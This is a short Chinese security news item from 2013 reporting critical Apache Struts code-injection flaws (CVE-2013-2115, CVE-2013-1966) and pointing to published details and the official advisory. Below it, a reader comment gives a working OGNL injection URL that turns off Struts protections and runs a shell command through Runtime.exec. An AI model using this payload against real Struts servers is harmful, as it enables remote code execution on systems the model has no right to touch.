Apache Struts发布重要安全更新

2013-06-04 77835人围观 ,发现 4 个不明物体 资讯

之前连爆Struts的好几个高危漏洞,允许攻击者注入代码,例如通过定制HTTP请求发送到Apache Struts服务端,可能执行任意代码等。该漏洞已被确定为CVE-2013-2115和CVE-2013-1966,根据Struts发布的公告定义威胁级别为“highly critical”。

国内安全研究者空虚浪子心在5月下旬公布了Struts漏洞的一些细节,点击这里查看原文。国外安全研究者在5月29日也发布了漏洞的细节和POC,证明在2.3.14.2版本都可能存在该问题。

官方公告点击查看

这些评论亮了

  • fuck 回复
    http://127.0.0.1:8080/struts2-blank/example/${#context['xwork.MethodAccessor.denyMethodExecution']=!(#_memberAccess['allowStaticMethodAccess']=true),(@java.lang.Runtime@getRuntime()).exec('touch aaa').waitFor()}.action/
    )6( 亮了
发表评论

已有 4 条评论

取消
Loading...
css.php